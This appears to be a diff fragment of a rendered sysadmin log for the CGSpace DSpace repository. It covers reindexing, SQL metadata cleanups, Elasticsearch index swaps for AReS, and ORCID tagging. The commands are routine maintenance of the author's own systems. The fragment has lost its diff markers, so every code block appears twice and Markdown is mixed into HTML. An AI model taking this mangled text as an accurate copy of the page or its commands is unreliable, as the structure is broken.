<li>Test the CG Core v2 migration on DSpace Test (linode26) one last time</li>
</ul>
@ -640,17 +640,17 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace
<li>Start the CG Core v2 migration on CGSpace (linode18)</li>
<li>After deploying the latest <code>6_x-prod</code> branch and running <code>migrate-fields.sh</code> I started a full Discovery reindex:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 311m12.617s
user 217m3.102s
sys 2m37.363s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 311m12.617s
</span></span><span style="display:flex;"><span>user 217m3.102s
</span></span><span style="display:flex;"><span>sys 2m37.363s
</span></span></code></pre></div><ul>
<li>Then update OAI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace oai import -c
$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace oai import -c
</span></span><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
</span></span></code></pre></div><ul>
<li>Ben Hack was asking if there is a REST API query that will give him all ILRI outputs for their new Sharepoint intranet
<ul>
<li>I told him he could try something like this if he only needs the ILRI articles in journals collection:</li>
@ -668,16 +668,16 @@ $ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74
</ul>
</li>
</ul>
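<ul>
<li>Something like the DSpace 6 REST API&rsquo;s collection items endpoint should work for that (placeholder UUID; paginate with <code>limit</code> and <code>offset</code>):</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'https://cgspace.cgiar.org/rest/collections/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/items?limit=100&amp;offset=0'
</code></pre>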
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;</span>
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;</span>
</span></span><span style="display:flex;"><span>$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
</span></span></code></pre></div><ul>
<li>The process took an hour or so!</li>
<li>I added colorized output to the csv-metadata-quality tool and tagged <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.4">version 0.4.4 on GitHub</a></li>
<li>I updated the fields in AReS Explorer and then removed the old temp index so I can start a fresh re-harvest of CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><h2 id="2021-02-22">2021-02-22</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><h2 id="2021-02-22">2021-02-22</h2>
<ul>
<li>Start looking at splitting the series name and number in <code>dcterms.isPartOf</code> now that we have migrated to CG Core v2
<ul>
@ -687,43 +687,43 @@ $ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
UPDATE 104
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
</span></span><span style="display:flex;"><span>UPDATE 104
</span></span></code></pre></div><ul>
<li>As for splitting the other values, I think I can export the <code>dspace_object_id</code> and <code>text_value</code> and then upload it as a CSV rather than writing a Python script to create the new metadata values</li>
</ul>
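<ul>
<li>That export could be a simple psql <code>\copy</code>, for example (field 166 is <code>dcterms.isPartOf</code>, as in the UPDATE above):</li>
</ul>
<pre tabindex="0"><code>localhost/dspace63= &gt; \copy (SELECT dspace_object_id, text_value FROM metadatavalue WHERE metadata_field_id=166 AND text_value LIKE '%;%') TO '/tmp/isPartOf.csv' CSV HEADER
</code></pre>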
<h2 id="2021-02-22-1">2021-02-22</h2>
<ul>
<li>Check the results of the AReS harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 101380,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 101380,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Set the current items index to read only and make a backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
</span></span></code></pre></div><ul>

- Delete the current items index and clone the temp one to it:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span></code></pre></div><ul>

- Then delete the temp and backup:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
{&#34;acknowledged&#34;:true}%
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-22&#39;</span>
</code></pre></div><h2 id="2021-02-23">2021-02-23</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-22&#39;</span>
</span></span></code></pre></div><h2 id="2021-02-23">2021-02-23</h2>

- CodeObia sent a [pull request for clickable countries on AReS](https://github.com/ilri/OpenRXV/pull/75)
- Remove semicolons from series names without numbers:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
UPDATE 104
dspace=# COMMIT;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
</span></span><span style="display:flex;"><span>UPDATE 104
</span></span><span style="display:flex;"><span>dspace=# COMMIT;
</span></span></code></pre></div><ul>

- Set all `text_lang` values on CGSpace to `en_US` to make the series replacements easier (this didn't work, read below):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE text_lang !=&#39;en_US&#39; AND dspace_object_id IN (SELECT uuid FROM item);
UPDATE 911
cgspace=# COMMIT;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE text_lang !=&#39;en_US&#39; AND dspace_object_id IN (SELECT uuid FROM item);
</span></span><span style="display:flex;"><span>UPDATE 911
</span></span><span style="display:flex;"><span>cgspace=# COMMIT;
</span></span></code></pre></div><ul>

- Then export all series with their IDs to CSV:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# \COPY (SELECT dspace_object_id, text_value as &#34;dcterms.isPartOf[en_US]&#34; FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# \COPY (SELECT dspace_object_id, text_value as &#34;dcterms.isPartOf[en_US]&#34; FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
</span></span></code></pre></div><ul>

- In OpenRefine I trimmed and consolidated whitespace, then made some quick cleanups to normalize the fields based on a sanity check (see the GREL sketch after this list)
  - For example many Spore items are like "Spore, Spore 23"
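
The whitespace cleanup is OpenRefine's standard common transforms, or equivalently a GREL expression along these lines (a sketch, not necessarily the exact expression I used):

```console
value.trim().replace(/\s+/, " ") # collapse runs of whitespace and trim the ends (sketch)
```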
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_value_id=5355845;
UPDATE 1
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_value_id=5355845;
</span></span><span style="display:flex;"><span>UPDATE 1
</span></span></code></pre></div><ul>

- This also seems to work, using the id for just that one item:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id=&#39;9840d19b-a6ae-4352-a087-6d74d2629322&#39;;
UPDATE 37
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id=&#39;9840d19b-a6ae-4352-a087-6d74d2629322&#39;;
</span></span><span style="display:flex;"><span>UPDATE 37
</span></span></code></pre></div><ul>

- This seems to work better for some reason:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspacetest=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
UPDATE 18659
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspacetest=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
</span></span><span style="display:flex;"><span>UPDATE 18659
</span></span></code></pre></div><ul>

- I split the CSV file in batches of 5,000 using xsv (sketched below), then imported them one by one in CGSpace:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace metadata-import -f /tmp/0.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-import -f /tmp/0.csv
</span></span></code></pre></div><ul>
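
The split itself would have been something like this (a sketch from memory; xsv names the output files after the starting row, so you get `/tmp/0.csv`, `/tmp/5000.csv`, and so on):

```console
$ xsv split -s 5000 /tmp /tmp/2021-02-23-series.csv
```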

- It took FOREVER to import each file... like several hours *each*. MY GOD DSpace 6 is slow.
- Help Dominique Perera debug some issues with the WordPress DSpace importer plugin from Macaroni Bros
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] &#34;GET /rest/communities?limit=1000 HTTP/1.1&#34; 200 188779 &#34;https://cgspace.cgiar.org/rest /communities?limit=1000&#34; &#34;RTB website BOT&#34;
104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] &#34;GET /rest/communities//communities HTTP/1.1&#34; 404 714 &#34;https://cgspace.cgiar.org/rest/communities//communities&#34; &#34;RTB website BOT&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] &#34;GET /rest/communities?limit=1000 HTTP/1.1&#34; 200 188779 &#34;https://cgspace.cgiar.org/rest /communities?limit=1000&#34; &#34;RTB website BOT&#34;
</span></span><span style="display:flex;"><span>104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] &#34;GET /rest/communities//communities HTTP/1.1&#34; 404 714 &#34;https://cgspace.cgiar.org/rest/communities//communities&#34; &#34;RTB website BOT&#34;
</span></span></code></pre></div><ul>

- The first request is OK, but the second one is malformed for sure

## 2021-02-24

- Export a list of journals for Peter to look through:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.journal&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
COPY 3345
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.journal&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 3345
</span></span></code></pre></div><ul>

- Start a fresh harvesting on AReS because Udana mapped some items today and wants to include them in his report:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>

- Also, I want to include the new series name/number cleanups so it's not a total waste of time

## 2021-02-25

- Hmm the AReS harvest last night seems to have finished successfully, but the number of items is less than I was expecting:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 99546,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 99546,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>

- The current items index has 101380 items... I wonder what happened
  - I started a new indexing
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,&#34;&#34;)
value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,&#34;&#34;)
</span></span><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;)
</span></span></code></pre></div><ul>

- This `value.partition` was new to me... and it took me a bit of time to figure out whether I needed to escape the parentheses in the issue number or not (no) and how to reference a capture group with `value.replace`
- I tried to check the 1095 CIFOR records from last week for duplicates on DSpace Test, but the page says "Processing" and never loads
- Niroshini from IWMI is still having issues adding WLE subjects to items during the metadata review step in the workflow
- It seems the BatchEditConsumer log spam is gone since I applied [Atmire's patch](https://github.com/ilri/DSpace/pull/462)
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#39;BatchEditConsumer should not have been given&#39;</span> dspace.log.2021-02-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*
dspace.log.2021-02-10:5067
dspace.log.2021-02-11:2647
dspace.log.2021-02-12:4231
dspace.log.2021-02-13:221
dspace.log.2021-02-14:0
dspace.log.2021-02-15:0
dspace.log.2021-02-16:0
dspace.log.2021-02-17:0
dspace.log.2021-02-18:0
dspace.log.2021-02-19:0
dspace.log.2021-02-20:0
dspace.log.2021-02-21:0
dspace.log.2021-02-22:0
dspace.log.2021-02-23:0
dspace.log.2021-02-24:0
dspace.log.2021-02-25:0
dspace.log.2021-02-26:0
dspace.log.2021-02-27:0
dspace.log.2021-02-28:0
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;BatchEditConsumer should not have been given&#39;</span> dspace.log.2021-02-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*
</span></span><span style="display:flex;"><span>dspace.log.2021-02-10:5067
</span></span><span style="display:flex;"><span>dspace.log.2021-02-11:2647
</span></span><span style="display:flex;"><span>dspace.log.2021-02-12:4231
</span></span><span style="display:flex;"><span>dspace.log.2021-02-13:221
</span></span><span style="display:flex;"><span>dspace.log.2021-02-14:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-15:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-16:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-17:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-18:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-19:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-20:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-21:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-22:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-23:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-24:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-25:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-26:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-27:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-28:0
</span></span></code></pre></div><!-- raw HTML omitted -->


## 2021-03-04

- I looked at the number of connections in PostgreSQL and it's definitely high again:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
1020
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>1020
</span></span></code></pre></div><ul>

- I reported it to Atmire on the [same issue](https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=851) where we had been tracking this before
- Abenet asked me to add a new ORCID for ILRI staff member Zoe Campbell
- I added it to the controlled vocabulary and then tagged her existing items on CGSpace using my `add-orcid-identifiers-csv.py` script:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-03-04-add-zoe-campbell-orcid.csv
dc.contributor.author,cg.creator.identifier
&#34;Campbell, Zoë&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
&#34;Campbell, Zoe A.&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-03-04-add-zoe-campbell-orcid.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Campbell, Zoë&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
</span></span><span style="display:flex;"><span>&#34;Campbell, Zoe A.&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
